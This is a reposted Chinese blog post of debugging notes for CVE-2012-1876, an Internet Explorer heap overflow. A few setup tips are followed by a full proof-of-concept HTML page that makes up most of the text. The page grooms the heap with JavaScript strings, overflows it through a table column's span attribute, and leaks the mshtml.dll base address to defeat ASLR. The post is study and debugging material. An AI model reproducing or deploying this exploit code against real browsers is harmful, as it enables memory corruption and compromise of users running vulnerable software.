CVE-2012-1876调试要点

    调试要点:

  1. .childdbg 1命令无效时,直接在拖入poc.html之后进行Attach,中间会有IE的Active控件加载暂停IE
  2. 进行真实的exp调试时,需关闭hpa,使得程序的堆管理在正常情况下进行
  3. 此poc的思想是先通过Js分配堆内存,然后再释放一部分造成已分配堆块之间产生空闲的间隙堆块,之后再解析<table>的时候,会分配0x1C*max(span,4)大小的堆块,poc中设置span=9,是因为0x1C*9=0xFC<0x100,刚好使得之前释放的空隙堆块再次分配出来,最后Js设置<table>span为19,来造成溢出。所以总结起来堆块的操作顺序就是:先Js代码不断分配释放构成空闲间隙堆块布局->解析<table>中span属性将空闲间隙堆块分配出来->Js代码设置<table>span属性来造成堆复制溢出。根据Html从上到下的解析顺序得到POC代码如下
    <html>
    <body>
    <div id="evil"></div>
    <script language='javascript'>
    
            // Step 1 of the PoC described in the notes above: build a predictable heap
            // layout before the <table> elements further down are parsed.
            // `leak_index` is only written by the second script, once it finds a string
            // whose length no longer matches what was allocated here.
            var leak_index = -1;
     
            // Three filler strings, each grown by self-concatenation until it holds at
            // least 480 characters; only a 125-character prefix of each is used below.
            var dap = "EEEE";
            while ( dap.length < 480 ) dap += dap;
     
            var padding = "AAAA";
            while ( padding.length < 480 ) padding += padding;
     
            var filler = "BBBB";
            while ( filler.length < 480 ) filler += filler;
     
            
            // `arr` is read again by the second script; `rra` is partially released below.
            var arr = new Array();
            var rra = new Array();
     
            // Hidden container so the <button> elements created below do not affect layout.
            var div_container = document.getElementById("evil");
            div_container.style.cssText = "display:none";
            //1. Lay out heap chunks: 250 iterations (even i from 0 to 498), each allocating
            //   three 125-character substrings ((0x100-6)/2 == 125) and one <button>, always
            //   in the same order. The notes above say each string is meant to land in a
            //   0x100-byte chunk; that depends on the IE/JScript allocator, not on this code.
            for (var i=0; i < 500; i+=2) {
     
                // E
                rra[i] = dap.substring(0, (0x100-6)/2);
     
                // S, bstr = A
                arr[i] = padding.substring(0, (0x100-6)/2);
     
                // A, bstr = B
                arr[i+1] = filler.substring(0, (0x100-6)/2);
     
                // B
                var obj = document.createElement("button");
                div_container.appendChild(obj);
     
            }
     
            // Release the `rra` strings at even indices 200..498 (150 of them, matching how
            // they were assigned) and run the collector after each release, so that free gaps
            // are left between the surviving allocations (note 3 above).
            // CollectGarbage() is a JScript/IE-specific global; other engines do not define it.
            for (var i=200; i<500; i+=2 ) {
                rra[i] = null;
                CollectGarbage();
            }
    
    
    </script>
    //2.占位空闲间隙堆块
    <table style="table-layout:fixed" ><col id="1" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="2" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="3" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="4" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="5" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="6" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="7" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="8" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="9" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="10" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="11" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="12" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="13" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="14" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="15" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="16" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="17" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="18" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="19" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="20" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="21" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="22" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="23" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="24" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="25" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="26" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="27" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="28" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="29" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="30" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="31" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="32" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="33" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="34" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="35" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="36" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="37" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="38" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="39" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="40" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="41" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="42" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="43" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="44" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="45" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="46" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="47" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="48" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="49" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="50" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="51" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="52" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="53" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="54" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="55" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="56" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="57" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="58" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="59" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="60" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="61" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="62" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="63" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="64" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="65" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="66" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="67" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="68" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="69" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="70" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="71" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="72" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="73" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="74" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="75" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="76" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="77" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="78" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="79" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="80" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="81" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="82" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="83" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="84" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="85" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="86" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="87" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="88" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="89" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="90" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="91" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="92" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="93" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="94" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="95" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="96" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="97" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="98" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="99" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="100" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="101" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="102" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="103" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="104" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="105" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="106" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="107" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="108" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="109" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="110" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="111" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="112" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="113" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="114" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="115" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="116" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="117" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="118" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="119" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="120" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="121" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="122" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="123" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="124" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="125" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="126" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="127" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="128" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="129" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="130" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="131" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="132" width="41" span="9" >&nbsp</col></table>
    
    <script language='javascript'>	
        //3. Change the span attribute of the last <col> (parsed above with span="9") to 19,
        //   which the notes above describe as triggering the heap copy overflow.
        //   `arr` and `leak_index` are defined by the first script on this page.
    	var evil_col = document.getElementById("132");	
    	evil_col.span = "19";
    	alert("after over flow");
    	
    	// Scan the strings allocated by the first script: one whose reported length now
    	// exceeds the 125 characters it was created with has had its header overwritten.
    	var leak_addr=-1;
    	for(var i = 0;i<500;i++){
            //# Once such a string is found, reading past its original end reaches the next
            //  heap chunk (per the notes, one belonging to a button), whose first field is a
            //  virtual function table pointer. Because that table lives in .rdata at a fixed
            //  offset from the DLL base, the notes compute: layout object's vtable pointer
            //  (spelled "CBuutonLayout" in the original notes, presumably CButtonLayout)
            //  minus offset = mshtml base.
    		if(arr[i].length>(0x100-6)/2){
    			leak_index=i;
    			// Character indices 130..131: 5 characters (10 bytes) past the original
    			// 125-character content, i.e. two UTF-16 code units.
    			var leak=arr[i].substring((0x100-6)/2+(2+8)/2,(0x100-6)/2+(2+8+4)/2);
    			// Reassembles the two 16-bit units little-endian into one 32-bit value.
    			// NOTE(review): toString(16) is not zero-padded, so this concatenation only
    			// yields the intended value when both units are >= 0x1000.
    			leak_addr = parseInt(leak.charCodeAt(1).toString(16)+leak.charCodeAt(0).toString(16),16);
    			alert(leak_addr.toString(16));
    			// The subtracted constant is the vtable offset inside one particular
    			// mshtml.dll build; it is not portable across versions or patch levels.
    			leak_addr=leak_addr-Number(0x001584f8);
    			alert(leak_addr.toString(16));
    			break;
    		}
    	}    
    </script>
    
    
    </body>
    </html>

     

 

转载于:https://my.oschina.net/u/3281747/blog/1922878
